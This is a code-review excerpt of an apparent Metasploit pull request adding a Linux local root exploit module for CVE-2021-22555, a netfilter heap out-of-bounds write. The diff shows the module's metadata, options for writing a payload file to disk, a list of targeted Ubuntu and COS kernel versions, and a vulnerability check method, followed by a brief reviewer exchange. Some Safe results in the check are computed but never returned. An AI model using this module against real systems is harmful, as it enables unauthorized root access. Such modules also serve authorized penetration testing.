modules/exploits/linux/local/netfilter_xtables_heap_oob_write_priv_esc.rb

```diff
@@ -0,0 +1,169 @@
+        'Arch' => [ARCH_X64, ARCH_X86],
+        'SessionTypes' => ['meterpreter', 'shell'],
+        'Targets' => [
+          ['Automatic', {}]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Reliability' => [ UNRELIABLE_SESSION ], # The module could fail to get root sometimes.
+          'Stability' => [ OS_RESOURCE_LOSS ], # After too many failed attempts, the system needs to be restarted.
+          'SideEffects' => [ ARTIFACTS_ON_DISK ]
+        },
+        'References' => [
+          ['CVE', '2021-22555'],
+          ['URL', 'https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2021-22555'],
+          ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22555'],
+          ['URL', 'https://ubuntu.com/security/CVE-2021-22555']
+        ]
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('WritableDir', [true, 'Directory to write persistent payload file.', '/var/tmp']),
+        OptInt.new('CmdTimeout', [true, 'Maximum number of seconds to wait for the exploit to complete', 10])
+      ]
+    )
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def cmd_timeout
+    datastore['CmdTimeout'].to_i
+  end
+
+  def supported_kernels
+    ubuntu_kernels + cos_kernels
+  end
+
+  def ubuntu_kernels
+    [
+      '5.8.0-23-generic', '5.8.0-25-generic', '5.8.0-28-generic', '5.8.0-29-generic',
+      '5.8.0-33-generic', '5.8.0-34-generic', '5.8.0-36-generic', '5.8.0-38-generic',
+      '5.8.0-40-generic', '5.8.0-41-generic', '5.8.0-43-generic', '5.8.0-44-generic',
+      '5.8.0-45-generic', '5.8.0-48-generic', '5.8.0-49-generic', '5.8.0-50-generic',
+      '5.8.0-53-generic', '5.8.0-53-lowlatency'
+    ]
+  end
+
+  def cos_kernels
+    [ '5.4.89-1.el8.x86_64' ]
+  end
+
+  def kernel_supported?(kernel)
+    supported_kernels.include? kernel
+  end
+
+  def check
+    unless kernel_modules.include? 'ip_tables'
+      vprint_warning('The ip_tables module is not loaded.')
+      return CheckCode::Safe('The ip_tables module is not loaded.')
+    end
+
+    CheckCode::Safe('LKRG is installed') if lkrg_installed?
+    CheckCode::Safe('grsecurity is in use') if grsec_installed?
+
+    msgmni_path = '/proc/sys/kernel/msgmni'
+    CheckCode::Safe("#{msgmni_path} is not readable.") if !readable?(msgmni_path)
+    msgmni = cmd_exec('cat', msgmni_path, cmd_timeout).to_i
+    release = kernel_release
+    if kernel_supported? release
+      # Setting the MSGMNI to a lower value is an easy remedy for this exploit on vulnerable kernels.
+      # The exploit uses #define NUM_MSQIDS 4096, which is the minimum allowed message queue length.
+      if msgmni >= 4096
+        CheckCode::Vulnerable("Target is running kernel release #{release}.")
+      else
+        CheckCode::Safe("The kernel's MSGMNI queue size of #{msgmni} is too small for the exploit to execute successfully.")
```

Comment:
It might be worth telling the user what they can do in this scenario, if anything. As well as outputting both the current/expected queue size.

Reply:
I've added more information to the description 👍